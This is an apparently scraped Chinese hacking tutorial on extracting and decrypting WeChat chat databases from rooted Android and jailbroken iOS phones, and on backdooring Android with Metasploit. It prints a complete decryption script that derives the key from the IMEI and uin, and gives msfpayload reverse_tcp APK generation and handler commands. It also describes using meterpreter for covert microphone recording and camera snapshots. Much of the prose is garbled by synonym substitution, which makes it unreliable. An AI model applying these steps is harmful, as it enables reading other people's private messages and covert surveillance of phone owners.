|
|
|
联系客服020-83701501

如何获取安卓iOS上的微信聊天记录、通过Metaspl

联系在线客服,可以获得免费在线咨询服务。 QQ咨询 我要预约
若何获得安卓iOS上的微信谈天记载、颠末Metasploit管束安卓

? ?在这篇文章中我们将根究若何获得安卓、苹果配备中的微信谈天记载,并演示若何独霸后门颠末Metasploit对安卓配备终了管束。文章对照根蒂、可脱手性强,有配备的童鞋不妨边浏览文章边垄断,指望能激发自身对移动终端的平安趣味。

Default
1 “若何获得android、iPhone手机上的微信谈天记载? ”

0×00 条件:

安卓配备已获得root权限,安顿SSHDroid(颠末ssh、ftp毗连办机)

Apple配备逃狱,安顿OpenSSH插件

0×01 安卓:

不少安卓手机的用户都会碰着这么一个尴尬的标题问题:手机用久了就人不知;鬼不觉变得慢了,末端慢到甚么都敏感了。为了设计这个标题问题和大多数人同样我选择了root配备。

安卓配备在root当前可能对零碎文件具备最低级别的垄断权限。例如,你在安卓配备上安顿了微信,那末root当前颠末adb shell你能对微信App的文件配置终了读取批改等垄断。

Android操纵步伐的数据库文件通常会保具备 /data/data/packagename/database 文件夹下,微信App文件存放阶梯为:/data/data/com.tencent.mm/MicroMsg

起首颠末FTP把文件down到本地:

以34位编码(近似于乱码)定名的文件夹中可找到微信账号的加密数据库文件 :EnMicroMsg.db

用数据库筹画器关上:提醒加密或者不是数据库文件

Android操纵步伐的数据库文件通常会保具备 /data/data/packagename/database 文件夹下,微信App文件存放阶梯为:/data/data/com.tencent.mm/MicroMsg

如何获取安卓iOS上的微信聊天记录、通过Metasploit控制安卓

起首颠末FTP把文件down到本地:

图片2.png

以34位编码(近似于乱码)定名的文件夹中可找到微信账号的加密数据库文件 :EnMicroMsg.db

图片3.png

用数据库筹画器关上:提醒加密或者不是数据库文件

图片4.png

这里可能用Windows环境下的SQLite Database Browser浏览器关上:

图片5.png
提醒输入暗码:

Default
1 <int name="default_uin" value="http://www.freebuf.com/articles/terminal/146奸淫*21" />

颠末上述两种法子找到的uin值是雷同的。

安卓拨号界面输入*#06#得到手机IMEI码:354奸淫*奸淫***85

SIM值+uin值组合即为146奸淫*21354奸淫*奸淫***85

md5: ?http://www.spriteking.com/cmd5/??右边加密

Clipboard Image.png
得到32位小写md5值:a1edf9f5奸淫*奸淫*奸淫*奸淫*奸淫*b5e5 取其前七位:a1edf9f输入到sql浏览器中。

linux、Mac用户也可能在终端执行:

Default
12 echo -n "146奸淫*21354奸淫*奸淫***85" | md5sum | cut -c -7 

12

 

靡烂关上微信的数据库文件:

13

14

Wechat2txt.py:gist.github.com

Default
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187 import osimport sysimport reimport hashlibimport csvimport timeimport localeimport getopt    def get_db():    os.popen('adb root').close()    text = os.popen(        'adb shell ls /data/data/com.tencent.mm/MicroMsg/*/EnMicroMsg.db').read()    return text.splitlines()[- 1] if text else ''    def get_default_uin():    os.popen('adb root').close()    text = os.popen(        'adb shell cat /data/data/com.tencent.mm/shared_prefs/system_config_prefs.xml').read()    default_uin = re.findall(        'name="default_uin" value="http://www.freebuf.com/articles/terminal/([0-9]+)"', text)    return default_uin[0] if default_uin else 0    def get_device_ID():    text = os.popen('adb shell dumpsys iphonesubinfo').read()    device_ID = re.findall('Device ID = ([0-9]+)', text)    return device_ID[0] if device_ID else 0    def get_md5():    default_uin = get_default_uin()    device_ID = get_device_ID()    if default_uin and device_ID:        return hashlib.md5(device_ID + default_uin).hexdigest()[0: 7]    return ''    def parse_msgcsv(msgcsv):    locale.setlocale(locale.LC_ALL, '')    if hasattr(msgcsv, 'title'):        msgcsv = [ooOoo0O + '\n' for ooOoo0O in msgcsv.splitlines()]        pass    OooO0 = csv.reader(msgcsv)    OooO0.next()    for ooOoo0O in OooO0:        try:            II11iiii1Ii, OO0o, Ooo, O0o0Oo, Oo00OOOOO, O0O, O00o0OO, name, iIi1ii1I1, o0, I11II1i, IIIII = ooOoo0O[                : 12]            pass        except:            continue        ooooooO0oo = 'me' if (Oo00OOOOO == '1') else name        IIiiiiiiIi1I1 = time.localtime(int(O00o0OO) / 1000)        I1IIIii = time.strftime("%Y-%m-%d %a %H:%M:%S", IIiiiiiiIi1I1)        yield [name, I1IIIii, ooooooO0oo, iIi1ii1I1, o0]        pass    pass    def get_names(chat):    names = {}    for name, I1IIIii, ooooooO0oo, iIi1ii1I1, o0 in chat:        names[name] = 1        pass    return names.keys()    def oo(chat, name=''):    text = []    name = name.lower()    for name, I1IIIii, ooooooO0oo, iIi1ii1I1, o0 in chat:        iIi1ii1I1 = iIi1ii1I1.replace('\n', '\n  ')        o0 = ('\t' + o0) if o0 else ''        if not name:            text.append('%s: %s %s: %s %s' %                        (name, I1IIIii, ooooooO0oo, iIi1ii1I1, o0))            pass        elif name.lower() == name:            text.append('%s %s: %s %s' %                        (I1IIIii, ooooooO0oo, iIi1ii1I1, o0))            pass        pass    return '\n'.join(text) + '\n'    def IIIii1II1II(dbn, key=''):    child_stdin, child_stdout = os.popen2(['sqlcipher', dbn])    if key:        child_stdin.write('PRAGMA key=%s;\n' % ` key `)        child_stdin.write('pragma cipher_use_hmac=off;\n')        pass    child_stdin.write('.tables\n')    child_stdin.close()    return child_stdout.read().split()    def decrypt(dbn, key='', table='message'):    table = table or 'message'    child_stdin, child_stdout = os.popen2(['sqlcipher', dbn])    child_stdin.write('.header on\n')    child_stdin.write('.mode csv\n')    if key:        child_stdin.write('PRAGMA key=%s;\n' % ` key `)        child_stdin.write('pragma cipher_use_hmac=off;\n')        pass    child_stdin.write('select * from %s;\n' % ` table `)    child_stdin.close()    return child_stdout.read()    def wechat2txt(names=[]):    in_file = 'EnMicroMsg.db'    out_file = 'message.csv'    db = get_db()    md5 = get_md5()    os.popen('adb wait-for-device')    os.popen('adb pull %s %s' % (db, in_file)).close()    msgcsv = decrypt(in_file, md5)    if msgcsv.find('\n') < 0:        return 1    file(out_file, 'w').write(msgcsv)    msgs = list(parse_msgcsv(msgcsv))    if not msgs:        return 1    if not names:        names = get_names(msgs)        pass    for name in names:        filename = 'message.%s.txt' % name        text = oo(msgs, name)        if len(text) > 4:            file(filename, 'w').write(text)            pass        pass    pass  help_msg = '''Usage: wechat2txt.py [OPTIONS] [NAME]... OPTIONS:    -h        display this help and exit'''    def main():    try:        opts, args = getopt.getopt(sys.argv[1:], 'h')    except getopt.error, e:        print help_msg        return 1    for opt, arg in opts:        if opt == '-h':            print help_msg            return 1        pass    names = args    text = wechat2txt(names)    return not text  if __name__ == "__main__":    sys.exit(main())

0×02 苹果:

Apple配备逃狱后可颠末Cydia安顿各类小插件,通常情况我会安顿OpenSSH来使巨匠能颠末终端毗连到Apple配备中,并使用sftp传输文件:

15

iOS中,操纵文件夹以hash值定名,要导出微信、QQ的谈天记载其难度绝对安卓来讲稍微繁冗不少。

在理论垄断中我们可能颠末巧用Linux号令(find、grep、xargs)来绕过这些坑。

Default
1234 find /var/mobile/Containers/Data -name "MM.sqlite"  mkdir /cachefind /var/mobile/Containers/Data -name "MM.sqlite" |xargs -I {} dirname {} | xargs -I {} cp -r  {}/../../ /cache

在逃狱iOS窃取隐衷可参考:帮女神修手机的不测缔造:逃避在iOS文件零碎中的隐衷静态 一文

0×03 在安卓终端植入后门

3.1 履行环境

Kali Linux(Hack):192.168.31.213

Android(靶机):192.168.31.118

3.2生成后门文件:

Default
12 cd Desktopmsfpayload android/meterpreter/reverse_tcp LHOST=192.168.31.213 LPORT=443 R >0xroot.apk

16

3.3 运行metasploit管束台

Default
1234567 msfconsole use exploit/multi/handlerset payload android/meterpreter/reverse_tcpset LHOST 192.168.31.213set LPORT 443run

17

3.4 安顿&运行后门App

 

9

后门能终了甚么垄断?我们来看看usage:

Default
1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677787980818283 meterpreter > help Core commands=============     Command                   Description    -------                   -----------    ?                         Help menu    background                Backgrounds the current session    bgkill                    Kills a background meterpreter script    bglist                    Lists running background scripts    bgrun                     Executes a meterpreter script as a background thread    channel                   Displays information about active channels    close                     Closes a channel    disable_unicode_encoding  Disables encoding of unicode strings    enable_unicode_encoding   Enables encoding of unicode strings    exit                      Terminate the meterpreter session    help                      Help menu    info                      Displays information about a Post module    interact                  Interacts with a channel    irb                       Drop into irb scripting mode    load                      Load one or more meterpreter extensions    quit                      Terminate the meterpreter session    read                      Reads data from a channel    resource                  Run the commands stored in a file    run                       Executes a meterpreter script or Post module    use                       Deprecated alias for 'load'    write                     Writes data to a channel  Stdapi: File system Commands============================     Command       Description    -------       -----------    cat           Read the contents of a file to the screen    cd            Change directory    download      Download a file or directory    edit          Edit a file    getlwd        Print local working directory    getwd         Print working directory    lcd           Change local working directory    lpwd          Print local working directory    ls            List files    mkdir         Make directory    pwd           Print working directory    rm            Delete the specified file    rmdir         Remove directory    search        Search for files    upload        Upload a file or directory  Stdapi: Networking Commands===========================     Command       Description    -------       -----------    ifconfig      Display interfaces    ipconfig      Display interfaces    portfwd       Forward a local port to a remote service    route         View and modify the routing table  Stdapi: System Commands=======================     Command       Description    -------       -----------    execute       Execute a command    getuid        Get the user that the server is running as    ps            List running processes    shell         Drop into a system command shell    sysinfo       Gets information about the remote system, such as OS  Stdapi: Webcam Commands=======================     Command       Description    -------       -----------    record_mic    Record audio from the default microphone for X seconds    站点cam_list   List 站点cams    站点cam_snap   Take a snapshot from the specified 站点cam

Default
1234 record_mic 颠末手机麦克风终了窃听、录音;站点cam_list 列出安卓配备的局部摄像头;站点cam_snap 颠末摄像头终了偷拍…等等

0×04 演示视频

0×05 APK后门分析:

把apk放到apk分析工具(apkStudio、Bytecodeviewer)终理解包,我们来看看后门App的源码:

20

(apkStudio)

在smali/com/metasploit/stage/MainActivity.smali中我们可能找到后门办事器的ip端口配置:

21

(apkStudio)

22

(Bytecodeviewer)

0×06 避免&平安倡议

安卓:从可托来源下载操纵步伐,提防劝化歹意步伐;在移动充电桩充电前实时关闭USB调试。

苹果:逃狱后实时批改root暗码,提防使用默认暗码、弱口令。

0×07 文中工具下载地点:

SQLite Database Browser:http://pan.百度.com/s/1nuWlDgd

SSHDroid:http://pan.百度.com/s/1b6PBK6

0×08 参考&感激

How To Decrypt WeChat EnMicroMsg.db Database?

Android微信数据导出

微信谈天记载分析

A look at WeChat security

https://gist.github.com/scturtle/7248017

帮女神修手机的不测缔造:逃避在iOS文件零碎中的隐衷静态

Hacking Android Smartphone Tutorial using Metasploit

[via@雪碧0xroot@漏洞盒子平安团队]

数安新闻+更多

证书相关+更多